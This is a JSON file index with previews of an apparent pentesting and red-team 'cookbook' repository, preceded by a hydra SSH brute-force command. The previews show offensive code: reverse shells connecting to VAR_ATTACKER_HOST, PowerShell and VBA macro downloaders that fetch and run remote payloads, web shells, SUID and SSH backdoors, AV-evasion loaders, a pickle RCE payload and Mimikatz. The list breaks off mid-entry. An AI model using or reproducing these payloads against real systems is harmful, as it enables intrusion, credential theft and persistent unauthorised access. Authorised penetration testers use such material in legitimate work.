    ~$ hydra -V -I -F -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -s VAR_TARGET_PORT -e nsr ssh://VAR_TARGET_HOST

 
[
  {
    "path": ".gitignore",
    "chars": 10,
    "preview": ".DS_Store\n"
  },
  {
    "path": "Notes.Checklist.txt",
    "chars": 7191,
    "preview": "-- Source: https://github.com/0xRadi/OWASP-Web-Checklist\n\n`` Steps\n\n    - Malware Injection (Spear-Phish, Web Exploits, "
  },
  {
    "path": "Notes.Exploits.txt",
    "chars": 5102,
    "preview": "`` Fuzzing\n\n    # TODO: Upload phazz sources\n\n    ~$ phazz.py fuzz -h VAR_TARGET_HOST -p 69 -n 100 -l 3000 -s tftp:read "
  },
  {
    "path": "Notes.Helpers.txt",
    "chars": 40281,
    "preview": "`` Compression\n\n    ~$ 7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=32m -ms=on -mhe=on -p archive.7z ./directory/\n\n`` Convert r"
  },
  {
    "path": "Notes.Wordlists.txt",
    "chars": 2481,
    "preview": "`` Passwords\n\n    `` Fast bruteforcing with typical combinations and top lists\n\n        - ~/lib/brutas/brutas-passwords-"
  },
  {
    "path": "README.md",
    "chars": 1882,
    "preview": "# pentesting-cookbook\n\n> A set of recipes useful in pentesting and red teaming scenarios\n\nSnippets, code samples and hin"
  },
  {
    "path": "Target.Host.OS.Linux.txt",
    "chars": 13897,
    "preview": "`` Initial\n\n    `` Upgrade\n\n        ~$ python -c \"import pty; pty.spawn('/bin/bash')\"\n        -- Don't forget Python 3.x"
  },
  {
    "path": "Target.Host.OS.Shells.txt",
    "chars": 9085,
    "preview": "`` Linux\n\n    @ snippets/linux/shells/\n\n`` Windows\n\n    @ snippets/windows/shells/\n\n`` Shell\n\n    ~$ nohup /bin/bash -i "
  },
  {
    "path": "Target.Host.OS.Windows.txt",
    "chars": 61171,
    "preview": "`` Enumeration\n\n    `` Automated\n\n        -- Easily detected by AV without patching\n        ~> seatbelt.exe all full > r"
  },
  {
    "path": "Target.Host.Service.AD.txt",
    "chars": 13042,
    "preview": "`` Helpers\n\n    `` Powerview\n\n        ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST"
  },
  {
    "path": "Target.Host.Service.AMQP.txt",
    "chars": 76,
    "preview": "`` RabbitMQ\n\n    ~$ nmap -Pn -sV -p 5672 --script amqp-info VAR_TARGET_HOST\n"
  },
  {
    "path": "Target.Host.Service.DB.MSSQL.txt",
    "chars": 5250,
    "preview": "`` Scanning\n\n    ~$ nmap VAR_TARGET_HOST -v -p 1433 -sV -Pn -vv --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-passw"
  },
  {
    "path": "Target.Host.Service.DB.MySQL.txt",
    "chars": 3291,
    "preview": "`` Scanning\n\n    ~$ nmap -p 3306 -sV -Pn -vv --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password"
  },
  {
    "path": "Target.Host.Service.DB.PostgreSQL.txt",
    "chars": 466,
    "preview": "`` Scanning\n\n    ~$ nmap VAR_TARGET_HOST -v -p 5432 -sV -Pn -vv\n\n`` Password Bruteforcing\n\n    ~$ nmap -p 5432 --script "
  },
  {
    "path": "Target.Host.Service.FTP.txt",
    "chars": 522,
    "preview": "`` Scanning\n\n    ~$ nmap -n -v -p 21 --script ftp-anon,ftp-syst VAR_TARGET_HOST\n\n`` Password Bruteforcing\n\n    ~$ nmap -"
  },
  {
    "path": "Target.Host.Service.HTTP.txt",
    "chars": 21842,
    "preview": "`` Initial\n\n    `` nikto\n\n        `` Less defaults, less intense, no dictionary\n\n            ~$ nikto -h http://VAR_TARG"
  },
  {
    "path": "Target.Host.Service.IDENT.txt",
    "chars": 82,
    "preview": "`` User enumeration\n\n    ~$ nmap -n -v -p 113 --script auth-owners VAR_TARGET_HOST"
  },
  {
    "path": "Target.Host.Service.LDAP.txt",
    "chars": 292,
    "preview": "`` Scanning\n\n    `` Anonymous\n\n        ~$ ldapsearch -h VAR_TARGET_HOST -p 389 -x -b \"dc=VAR_DOMAIN,dc=com\"\n        LDAP"
  },
  {
    "path": "Target.Host.Service.MSRPC.txt",
    "chars": 1310,
    "preview": "`` Scanning\n\n    ~$ nmap -n -v -sV -Pn -p135 --script msrpc-enum --script-args vulns.showall VAR_TARGET_HOST\n\n`` Connect"
  },
  {
    "path": "Target.Host.Service.NFS.txt",
    "chars": 849,
    "preview": "`` Scanning for accessible exports\n\n    ~$ nmap -v -n -p 111 --script nfs-ls VAR_TARGET_NETWORK\n\n`` General\n\n    ~$ show"
  },
  {
    "path": "Target.Host.Service.POP3.txt",
    "chars": 285,
    "preview": "`` Password Bruteforcing\n\n    ~$ nmap -n -v -p 995 --script pop3-brute --script-args=vulns.showall VAR_TARGET_HOST\n    ~"
  },
  {
    "path": "Target.Host.Service.RDP.txt",
    "chars": 1083,
    "preview": "`` Scanning\n\n    ~$ nmap --script rdp-enum-encryption,rdp-ntlm-info VAR_TARGET_HOST\n\n`` Connection\n\n    ~$ rdesktop -u g"
  },
  {
    "path": "Target.Host.Service.RPC.txt",
    "chars": 236,
    "preview": "`` Scanning\n\n    ~$ rpcinfo -p VAR_TARGET_HOST\n    ~$ nmap --script rpcinfo --script-args=unsafe=1 -p VAR_TARGET_PORT VA"
  },
  {
    "path": "Target.Host.Service.SMB.txt",
    "chars": 1753,
    "preview": "`` Check remote target access\n\n    ~> net use \\\\VAR_TARGET_HOST\\C$\n    ~> dir \\\\VAR_TARGET_HOST\\C$\n\n`` Enumeration\n\n    "
  },
  {
    "path": "Target.Host.Service.SMTP.txt",
    "chars": 1012,
    "preview": "`` Scanning\n\n    ~$ nmap --script smtp-commands,smtp-enum-users -vv -sV -Pn -p 25 VAR_TARGET_HOST\n\n`` Testing\n\n    ~$ sw"
  },
  {
    "path": "Target.Host.Service.SNMP.txt",
    "chars": 3160,
    "preview": "`` Scanning\n\n    `` Network discovery\n\n        ~$ nmap -sU -sV -p 161 VAR_TARGET_RANGE\n        ~$ onesixtyone -s -o VAR_"
  },
  {
    "path": "Target.Host.Service.SSH.txt",
    "chars": 1673,
    "preview": "`` Scanning\n\n    ~$ nmap -p 22 --script ssh-enum-algos,ssh-auth-methods,ssh-hostkey,ssh-publickey-acceptance,ssh-run VAR"
  },
  {
    "path": "Target.Host.Service.TELNET.txt",
    "chars": 415,
    "preview": "`` Scanning\n\n    ~$ nmap -v -n -p 23 VAR_TARGET_NETWORK\n\n`` Password Bruteforcing\n\n    ~$ nmap -n -v -p 23 --script teln"
  },
  {
    "path": "Target.Host.Service.VNC.txt",
    "chars": 161,
    "preview": "`` Password Bruteforcing\n\n    ~$ hydra -s 5900 -P VAR_WORDLIST -V -t 8 VAR_TARGET_HOST vnc\n\n    ~$ crowbar.py -b vnckey "
  },
  {
    "path": "Target.Host.Service.X11.txt",
    "chars": 553,
    "preview": "`` Scanning\n\n    ~$ nmap --script x11-access -p6000-6025 -n -v -Pn VAR_TARGET_HOST\n\n`` Information Gathering\n\n    ~$ xwi"
  },
  {
    "path": "Target.Network.Pivoting.txt",
    "chars": 8709,
    "preview": "`` Tunneling\n\n    `` sshuttle\n\n        ~$ sshuttle -r VAR_USERNAME@VAR_TARGET_HOST VAR_TARGET_CIDR\n\n    `` ssf\n\n        "
  },
  {
    "path": "Target.Network.Scanning.txt",
    "chars": 6717,
    "preview": "`` Host discovery\n\n    `` ARP\n\n        ~$ arp -a\n        ~$ arp-scan VAR_TARGET_CIDR -I eth0\n        ~$ fping -ar\n\n    `"
  },
  {
    "path": "Target.Network.Wireless.txt",
    "chars": 5923,
    "preview": "`` Important notes\n\n    - Remove `firmware-realtek` and use dkms\n    - Use `pentesting-bootsrap/bootstrap.rtl88**au.sh` "
  },
  {
    "path": "Target.Recon.DNS.txt",
    "chars": 1471,
    "preview": "`` DNS\n\n    `` CNAME hijacking\n\n        @ bin/dns_cnames.sh\n\n\n    `` Zone transfer\n\n        ~$ dig @ns.VAR_TARGET_DOMAIN"
  },
  {
    "path": "Target.Recon.Dorks.txt",
    "chars": 2143,
    "preview": "`` Google\n\n    `` Notes\n\n        For more narrow search replace \"VAR_ORGANIZATION_STRING\" with site:VAR_TARGET_HOST\n\n   "
  },
  {
    "path": "Target.Recon.OSINT.txt",
    "chars": 180,
    "preview": "`` OSINT\n\n    `` Automated\n\n        ~$ theharvester -d VAR_TARGET_DOMAIN -l 250 -b google,baidu,yahoo,bing,pgp\n        ~"
  },
  {
    "path": "bin/direnum_combo.sh",
    "chars": 1509,
    "preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n    echo \"Usage: $0 http://example.com\"\n    exit 1\nfi\n\nshopt -s extglob\nTARGET=${1%%+("
  },
  {
    "path": "bin/dns_cnames.sh",
    "chars": 248,
    "preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n    echo \"Usage: $0 domains.txt\"\n    exit 1\nfi\n\nfor domain in $(cat \"$1\"); do\n    resu"
  },
  {
    "path": "bin/dns_resolve.sh",
    "chars": 293,
    "preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n    echo \"Usage: $0 hosts.txt\"\n    exit 1\nfi\n\nfilter='has no|not found'\n\nfor domain in"
  },
  {
    "path": "bin/dns_transfer.sh",
    "chars": 181,
    "preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n    echo \"Usage: $0 example.com\"\n    exit 1\nfi\n\nfor ns in $(dig +noall +answer $1 -t n"
  },
  {
    "path": "bin/download_files.sh",
    "chars": 199,
    "preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n    echo \"Usage: $0 urls.txt\"\n    exit 1\nfi\n\nfor url in $(cat \"$1\"); do\n    echo \"Requ"
  },
  {
    "path": "bin/download_int.sh",
    "chars": 228,
    "preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n    echo \"Usage: $0 http://example.com/asset- <FIRST_INT> <LAST_INT>\"\n    exit 1\nfi\n\nf"
  },
  {
    "path": "bin/ftp_server.py",
    "chars": 1323,
    "preview": "#!/usr/bin/env python3\n\nimport argparse\n\nfrom pyftpdlib.authorizers import DummyAuthorizer\nfrom pyftpdlib.handlers impor"
  },
  {
    "path": "bin/hexdecode.py",
    "chars": 430,
    "preview": "#!/usr/bin/env python3\n\nimport argparse\n\n\nif __name__ == '__main__':\n\n    parser = argparse.ArgumentParser(description='"
  },
  {
    "path": "bin/hexreverse.py",
    "chars": 415,
    "preview": "#!/usr/bin/env python3\n\nimport argparse\n\n\nif __name__ == '__main__':\n\n    parser = argparse.ArgumentParser(description='"
  },
  {
    "path": "bin/http_codes.sh",
    "chars": 184,
    "preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n    echo \"Usage: $0 urls.txt\"\n    exit 1\nfi\n\nfor url in $(cat \"$1\"); do\n    echo $url "
  },
  {
    "path": "bin/httpd.py",
    "chars": 4189,
    "preview": "#!/usr/bin/env python3\n\nimport argparse\nimport cgi\nimport logging\nimport pathlib\nimport socket\nimport ssl\nfrom datetime "
  },
  {
    "path": "bin/mac_oui.sh",
    "chars": 208,
    "preview": "#!/bin/bash\n\nmac=\"$(echo $1 | sed 's/ //g' | sed 's/-//g' | sed 's/://g' | cut -c1-6)\"\n\nresult=\"$(grep -i -A 4 ^$mac ~/l"
  },
  {
    "path": "bin/mitm_toolkit.py",
    "chars": 2610,
    "preview": "import os\n\nimport mitmproxy as mitm\n\n\nclass ToolkitBase:\n\n    def __init__(self):\n        self.current_lab_ip = os.envir"
  },
  {
    "path": "bin/parse_gnmap.sh",
    "chars": 1096,
    "preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n    echo \"Usage:\"\n    echo -e \"$0 results.gnmap output_filename\"\n    exit 1\nfi\n\nif [[ "
  },
  {
    "path": "bin/ping.py",
    "chars": 1394,
    "preview": "#!/usr/bin/env python3\n\nimport asyncio\nimport concurrent.futures\nimport random\n\nimport click\nimport netaddr\nfrom scapy i"
  },
  {
    "path": "bin/ping.sh",
    "chars": 350,
    "preview": "#!/bin/bash\n\ntrap \"exit\" INT\n\nif [[ -z $1 ]]; then\n    echo \"Usage: $0 192.168.1.0/24\"\n    exit 1\nfi\n\nRED='\\033[0;31m'\nG"
  },
  {
    "path": "bin/quote.py",
    "chars": 289,
    "preview": "#!/usr/bin/env python3\n\nimport argparse\nimport urllib\n\n\nif __name__ == '__main__':\n\n    parser = argparse.ArgumentParser"
  },
  {
    "path": "bin/scan_top.sh",
    "chars": 2428,
    "preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n    echo \"Usage:\"\n    echo -e \"- with host discovery, target as CIDR (network as outpu"
  },
  {
    "path": "bin/snmp_enum.sh",
    "chars": 357,
    "preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n    echo \"Usage: $0 192.168.1.0/24\"\n    exit 1\nfi\n\nfor ip in $(prips $1); do\n    echo "
  },
  {
    "path": "bin/snmp_public_hosts.sh",
    "chars": 144,
    "preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n    echo \"Usage: $0 hosts.txt\"\n    exit 1\nfi\n\nfor host in $(cat \"$1\"); do\n    snmp-che"
  },
  {
    "path": "bin/ssh_enum_malform.py",
    "chars": 8661,
    "preview": "#!/usr/bin/env python3\n###########################################################################\n#                ____"
  },
  {
    "path": "bin/ssh_enum_time.py",
    "chars": 6487,
    "preview": "#!/usr/bin/env python3\n#\n# CVEs:           CVE-2016-6210 (Credits for this go to Eddie Harari)\n#\n# Author:         0_o -"
  },
  {
    "path": "bin/tomcat_brute.py",
    "chars": 2678,
    "preview": "#!/usr/bin/env python3\n\nimport argparse\nimport requests\n\n\nPASSWD = [\n    ('tomcat', ''),\n    ('admin', ''),\n    ('admin'"
  },
  {
    "path": "bin/vba_format.py",
    "chars": 657,
    "preview": "#!/usr/bin/env python3\n\nimport click\n\n\ndef vb_wrap(val):\n    return f'& \"{val}\" _'\n\n\n@click.command()\n@click.option('--b"
  },
  {
    "path": "bin/vbe_decoder.py",
    "chars": 6007,
    "preview": "#!/usr/bin/env python3\n\n__description__ = 'Decode an encoded VBScript, often seen as a .vbe file'\n__author__ = 'John Ham"
  },
  {
    "path": "bin/xor.py",
    "chars": 2086,
    "preview": "#!/usr/bin/env python3\n\nimport click\nimport sys\n\n\nclass Convert:\n\n    pass\n\n\nclass XOR(Convert):\n\n    def __init__(self,"
  },
  {
    "path": "snippets/html/smuggling.html",
    "chars": 1225,
    "preview": "<html>\n    <body>\n        <script>\n            function base64ToArrayBuffer(base64) {\n                var binary_string "
  },
  {
    "path": "snippets/java/shells/reverse/reverse.jsp",
    "chars": 1974,
    "preview": "<%-- Ex. http://192.168.1.1:8080/test.jsp?ip=192.168.1.100&port=8080&shell=/bin/bash --%>\n<%@\npage import=\"java.lang.*, "
  },
  {
    "path": "snippets/java/shells/reverse/reverse_bash.java",
    "chars": 190,
    "preview": "String[] cmd = {\n    \"/bin/bash\",\n    \"-c\",\n    \"exec 5<>/dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT;cat <&5 | while re"
  },
  {
    "path": "snippets/java/shells/reverse/reverse_php.java",
    "chars": 284,
    "preview": "String[] cmd = {\n    \"/bin/sh\",\n    \"-c\",\n    \"/bin/echo '<?php $sock=fsockopen(\\\"VAR_ATTACKER_HOST\\\", VAR_ATTACKER_PORT"
  },
  {
    "path": "snippets/java/shells/web/webshell.jsp",
    "chars": 1087,
    "preview": "<!DOCTYPE html>\n<html>\n<head>\n   <title></title>\n</head>\n<body>\n   <form method=\"GET\" action=\"webshell.jsp\">\n      <inpu"
  },
  {
    "path": "snippets/java/utils/jenkins_console.groovy",
    "chars": 185,
    "preview": "def sout = new StringBuffer(), serr = new StringBuffer()\ndef proc = 'VAR_STRING'.execute()\nproc.consumeProcessOutput(sou"
  },
  {
    "path": "snippets/linux/backdoors/ssh_reconnect.sh",
    "chars": 220,
    "preview": "#!/bin/sh\n\nif ps -ef | grep -v grep | grep VAR_ATTACKER_HOST ; then\n    exit 0\nelse\n    sshpass -p 'VAR_PASSWORD' ssh -f"
  },
  {
    "path": "snippets/linux/backdoors/suid_popen.c",
    "chars": 369,
    "preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <grp.h>\n\nint main(void)\n{\n    FI"
  },
  {
    "path": "snippets/linux/backdoors/suid_shell.c",
    "chars": 286,
    "preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <grp.h>\n\nint main(void)\n{\n    se"
  },
  {
    "path": "snippets/linux/maldocs/runner-1.c",
    "chars": 518,
    "preview": "#include <stdio.h>\n#include <stdlib.h>\n\n// msfvenom -p linux/x64/meterpreter/reverse_tcp -e x64/zutto_dekiru lhost=VAR_A"
  },
  {
    "path": "snippets/linux/shells/bind/udp.sh",
    "chars": 525,
    "preview": "#!/bin/sh\npython - <<EOF &\nlock = \"/tmp/ssh-o1Lonxx7lmaa\"\nimport os\nimport socket\nif os.path.isfile(lock):\n    exit()\nfi"
  },
  {
    "path": "snippets/linux/shells/reverse/reverse.c",
    "chars": 587,
    "preview": "#include <stdio.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <"
  },
  {
    "path": "snippets/linux/shells/reverse/reverse.pl",
    "chars": 3844,
    "preview": "#!/usr/bin/perl -w\n# perl-reverse-shell - A Reverse Shell implementation in PERL\n# Copyright (C) 2006 pentestmonkey@pent"
  },
  {
    "path": "snippets/linux/utils/bruteforce.sh",
    "chars": 551,
    "preview": "#!/bin/bash\n\n# This is a small utility for parallel passwords bruteforcing using\n# some tricks in the GNU Linux/bash env"
  },
  {
    "path": "snippets/linux/utils/ld_preload.c",
    "chars": 215,
    "preview": "/* gcc -fPIC -shared -o pe.so pe.c -nostartfiles */\n\n#include <stdio.h>\n#include <sys/types.h>\n#include <stdlib.h>\n\nvoid"
  },
  {
    "path": "snippets/linux/utils/persistence.py",
    "chars": 6049,
    "preview": "#!/usr/bin/env python\n\n# This is a stub for developing persistence over SSH, using base64-encoded\n# MySQL UDF (raptor), "
  },
  {
    "path": "snippets/linux/utils/port_scanning1.sh",
    "chars": 177,
    "preview": "#!/bin/bash\n\nhost=$1\nport_first=1\nport_last=65535\n\nfor ((port=$port_first; port<=$port_last; port++))\ndo\n  (echo >/dev/t"
  },
  {
    "path": "snippets/linux/utils/ps_monitoring.sh",
    "chars": 219,
    "preview": "#!/bin/bash\n\nIFS=$'\\n'\n\nold_process=$(ps -eo command)\n\nwhile true; do\n    new_process=$(ps -eo command)\n    diff <(echo "
  },
  {
    "path": "snippets/linux/utils/python_pickle.py",
    "chars": 336,
    "preview": "#!/usr/bin/env python\n\nimport pickle\nimport os\nimport base64\n\n\nclass Payload():\n\n    def __reduce__(self):\n        cmd ="
  },
  {
    "path": "snippets/linux/utils/so_injection.c",
    "chars": 244,
    "preview": "/* gcc -shared -o expected_path.so -fPIC so_injection.c */\n\n#include <stdio.h>\n#include <stdlib.h>\n\nstatic void inject()"
  },
  {
    "path": "snippets/php/recursive_dir.php",
    "chars": 600,
    "preview": "<?php\n\n// \"/Users/\" (macOS)\n// \"/home/\" (GNU/Linux)\n// \"C:\\Documents and Settings\\\" (Windows 2000/XP/2003)\n// \"C:\\Users\\"
  },
  {
    "path": "snippets/python/port_scanning.py",
    "chars": 406,
    "preview": "#!/usr/bin/env python\n\nfrom socket import *\n\n\nif __name__ == '__main__':\n    target = raw_input('Enter host to scan: ')\n"
  },
  {
    "path": "snippets/windows/maldocs/downloader-1.cs",
    "chars": 2345,
    "preview": "using System;\nusing System.Threading.Tasks;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\n\n\n// msfveno"
  },
  {
    "path": "snippets/windows/maldocs/downloader-1.js",
    "chars": 651,
    "preview": "var url = \"https://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT/test.doc\";\nvar req = WScript.CreateObject(\"MSXML2.ServerXMLHTTP\")"
  },
  {
    "path": "snippets/windows/maldocs/downloader-1.ps1",
    "chars": 311,
    "preview": "IEX (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/Invoke-ReflectivePEInjection.ps1')\n$bytes"
  },
  {
    "path": "snippets/windows/maldocs/downloader-1.vba",
    "chars": 538,
    "preview": "Sub Document_Open()\n    Init\nEnd Sub\n\nSub AutoOpen()\n    Init\nEnd Sub\n\nSub Init()\n    Dim str As String\n    Dim shellBin"
  },
  {
    "path": "snippets/windows/maldocs/downloader-1.vbs",
    "chars": 303,
    "preview": "' msfvenom -p windows/x64/shell_reverse_tcp lhost=VAR_ATTACKER_HOST lport=443 -f psh-reflection > test.doc\n\nSet Shell = "
  },
  {
    "path": "snippets/windows/maldocs/downloader-1.xls",
    "chars": 59,
    "preview": "=msexcel|'..\\..\\..\\Windows\\system32\\cmd.exe /c calc.exe'!A0"
  },
  {
    "path": "snippets/windows/maldocs/downloader-2.js",
    "chars": 295,
    "preview": "<!-- echo GetObject(\"script:http://VAR_ATTACKER_HOST/1.js\") > 1.js && wscript.exe 1.js -->\n<?xml version=\"1.0\"?>\n<packag"
  },
  {
    "path": "snippets/windows/maldocs/downloader-2.vba",
    "chars": 278,
    "preview": "Sub MyMacro()\n    Dim str As String\n    str = \"powershell (New-Object System.Net.WebClient).DownloadString('http://VAR_A"
  },
  {
    "path": "snippets/windows/maldocs/evasion-1.cs",
    "chars": 557,
    "preview": "using System;\nusing System.Management.Automation;\nusing System.Configuration.Install;\nusing System.Diagnostics;\n\n\nnamesp"
  },
  {
    "path": "snippets/windows/maldocs/evasion-1.hta",
    "chars": 241,
    "preview": "<html>\n    <head>\n        <script>\n            a = new ActiveXObject(\"WScript.Shell\");\n            a.run('%windir%\\\\Syst"
  },
  {
    "path": "snippets/windows/maldocs/evasion-1.inf",
    "chars": 324,
    "preview": ";cmstp.exe /s cmstp.inf\n\n[version]\nSignature=$chicago$\nAdvancedINF=2.5\n\n[DefaultInstall_SingleUser]\nUnRegisterOCXs=UnReg"
  },
  {
    "path": "snippets/windows/maldocs/evasion-1.sct",
    "chars": 1181,
    "preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n<registration\n    description=\"Bandit\"\n    progid=\"Bandit\"\n    version=\"1.00\"\n    clas"
  },
  {
    "path": "snippets/windows/maldocs/evasion-1.url",
    "chars": 60,
    "preview": "[InternetShortcut]\nURL=file:///c:\\windows\\system32\\calc.exe\n"
  },
  {
    "path": "snippets/windows/maldocs/evasion-1.wsf",
    "chars": 301,
    "preview": "<?xml version=\"1.0\"?>\n<job id=\"Mixed\">\n    <script language=\"VBScript\">\n'        <![CDATA[\n            WScript.echo \"Tes"
  },
  {
    "path": "snippets/windows/maldocs/evasion-2.hta",
    "chars": 338,
    "preview": "<html>\n<head>\n<meta http-equiv=\"x-ua-compatible\" content=\"ie=9\">\n<title></title>\n<script language=\"VBScript\">\n    Set ob"
  },
  {
    "path": "snippets/windows/maldocs/evasion-2.inf",
    "chars": 403,
    "preview": "; DRIVER.INF\n; Copyright (c) Microsoft Corporation.  All rights reserved.\n\n[Version]\nSignature = \"$CHICAGO$\"\nClass=61883"
  },
  {
    "path": "snippets/windows/maldocs/evasion-2.sct",
    "chars": 578,
    "preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n\n<registration\n    description=\"Bandit\"\n    progid=\"Bandit\"\n    version=\"1.00\"\n    cla"
  },
  {
    "path": "snippets/windows/maldocs/evasion-msxml.xml",
    "chars": 455,
    "preview": "<?xml version='1.0'?>\n<stylesheet\nxmlns=\"http://www.w3.org/1999/XSL/Transform\" xmlns:ms=\"urn:schemas-microsoft-com:xslt\""
  },
  {
    "path": "snippets/windows/maldocs/evasion-msxml.xsl",
    "chars": 456,
    "preview": "<?xml version='1.0'?>\n<!-- msxsl.exe poc.xml poc.xml -->\n<stylesheet\nxmlns=\"http://www.w3.org/1999/XSL/Transform\" xmlns:"
  },
  {
    "path": "snippets/windows/maldocs/ntlm-1.url",
    "chars": 81,
    "preview": "[InternetShortcut]\nURL=https://10.0.0.1\nIconIndex=0\nIconFile=\\\\10.0.0.1\\test.ico\n"
  },
  {
    "path": "snippets/windows/maldocs/ntlm-evasion-mssql-1.csproj",
    "chars": 2911,
    "preview": "<!-- C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\msbuild.exe ntlm-evasion-mssql-1.csproj -->\n\n<Project ToolsVersion=\"4"
  },
  {
    "path": "snippets/windows/maldocs/runner-1.cs",
    "chars": 1270,
    "preview": "using System;\nusing System.Threading.Tasks;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\n\n\n// msfveno"
  },
  {
    "path": "snippets/windows/maldocs/runner-1.ps1",
    "chars": 1078,
    "preview": "# msfvenom -p windows/meterpreter/reverse_https lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT exitfunc=thread -f ps1\n\n"
  },
  {
    "path": "snippets/windows/maldocs/runner-1.vba",
    "chars": 1268,
    "preview": "' msfvenom -p windows/meterpreter/reverse_https lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT exitfunc=thread -f vbapp"
  },
  {
    "path": "snippets/windows/shells/bind/PortListener.ps1",
    "chars": 548,
    "preview": "$endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any, VAR_TARGET_PORT)\n$listener = New-Object System"
  },
  {
    "path": "snippets/windows/shells/bind/web1.asp",
    "chars": 633,
    "preview": "<%\nFunction RunCmd(command)\n Dim res as integer\n Dim myProcess As New Process()\n Dim myProcessStartInfo As New ProcessSt"
  },
  {
    "path": "snippets/windows/shells/bind/web2.asp",
    "chars": 956,
    "preview": "<%\nServer.ScriptTimeout = 180\n\nip=request.ServerVariables(\"REMOTE_ADDR\")\nif ip <> \"VAR_ATTACKER_HOST\" then\n response.Sta"
  },
  {
    "path": "snippets/windows/shells/bind/web3.asp",
    "chars": 1526,
    "preview": "<%@ Language=VBScript %>\n<%\n  ' --------------------o0o--------------------\n  '  File:    CmdAsp.asp\n  '  Author:  Maceo"
  },
  {
    "path": "snippets/windows/shells/bind/web4.aspx",
    "chars": 1318,
    "preview": "<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<%@ Import Namespace=\"System.Diagnostics\" %>\n<%@ Import Namespace=\""
  },
  {
    "path": "snippets/windows/shells/reverse/reverse1.bat",
    "chars": 2035,
    "preview": "echo #include ^<winsock2.h^> >> shell.c\r\necho #include ^<stdio.h^> >> shell.c\r\necho #pragma comment(lib, \"w2_32\") >> she"
  },
  {
    "path": "snippets/windows/shells/reverse/reverse1.cpp",
    "chars": 2782,
    "preview": "// Source: https://raw.githubusercontent.com/paranoidninja/ScriptDotSh-MalwareDevelopment/master/prometheus.cpp\n// Compi"
  },
  {
    "path": "snippets/windows/shells/reverse/reverse1.cs",
    "chars": 2259,
    "preview": "using System;\nusing System.Text;\nusing System.IO;\nusing System.Diagnostics;\nusing System.ComponentModel;\nusing System.Li"
  },
  {
    "path": "snippets/windows/shells/reverse/reverse1.ps1",
    "chars": 1677,
    "preview": "function cleanup {\nif ($client.Connected -eq $true) {$client.Close()}\nif ($process.ExitCode -ne $null) {$process.Close()"
  },
  {
    "path": "snippets/windows/shells/reverse/reverse2.cpp",
    "chars": 3004,
    "preview": "// Modified\n// Original: https://raw.githubusercontent.com/paranoidninja/ScriptDotSh-MalwareDevelopment/master/prometheu"
  },
  {
    "path": "snippets/windows/shells/reverse/reverse2.ps1",
    "chars": 515,
    "preview": "$client = New-Object System.Net.Sockets.TCPClient(\"VAR_TARGET_HOST\",VAR_TARGET_PORT);$stream = $client.GetStream();[byte"
  },
  {
    "path": "snippets/windows/shells/reverse/reverse_dll.c",
    "chars": 1322,
    "preview": "// gcc -shared -lws2_32 -o dll_rev_shell.dll dll_rev_shell.c\n// rundll32 rev.dll,main\n//#include \"pch.h\"\n#include \"stdli"
  },
  {
    "path": "snippets/windows/utils/DomainPasswordSpray.ps1",
    "chars": 19105,
    "preview": "function Invoke-DomainPasswordSpray{\n    <#\n    .SYNOPSIS\n\n    This module performs a password spray attack against user"
  },
  {
    "path": "snippets/windows/utils/Enable-Privilege.ps1",
    "chars": 1794,
    "preview": "function Enable-Privilege {\n\n    param(\n        $Privilege,\n        $ProcessId = $pid,\n        [Switch] $Disable\n    )\n "
  },
  {
    "path": "snippets/windows/utils/GrabAndRun.ps1",
    "chars": 2168,
    "preview": "# ░▒▓ GrabAndRun.ps1 ▓▒░\n#\n# Takes screenshot, grabs some local information, encrypts using X.509 public key and sends e"
  },
  {
    "path": "snippets/windows/utils/Invoke-Mimikatz-latest.ps1",
    "chars": 2685594,
    "preview": "function Invoke-Mimikatz\n{\n<#\n.SYNOPSIS\n\nThis script leverages Mimikatz 2.1.1 and Invoke-ReflectivePEInjection to reflec"
  },
  {
    "path": "snippets/windows/utils/PortScanning.ps1",
    "chars": 361,
    "preview": "$ErrorActionPreference = \"SilentlyContinue\"\n$ports = 1..65535\n$ip = \"VAR_TARGET_HOST\"\n\nforeach ($port in $ports) {\n    i"
  },
  {
    "path": "snippets/windows/utils/Self-Elevate.ps1",
    "chars": 473,
    "preview": "if (-Not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.P"
  },
  {
    "path": "snippets/windows/utils/SharingIsCaring.ps1",
    "chars": 4079,
    "preview": "# ░▒▓ SharingIsCaring.ps1 ▓▒░\n#\n# Massive SMB shares downloader used to test for data exposure in local networks\n#\n# Exa"
  },
  {
    "path": "snippets/windows/utils/Start-WebServer.ps1",
    "chars": 31412,
    "preview": "<#\n.Synopsis\nStarts powershell webserver\n.Description\nStarts webserver as powershell process.\nCall of the root page (e.g"
  },
  {
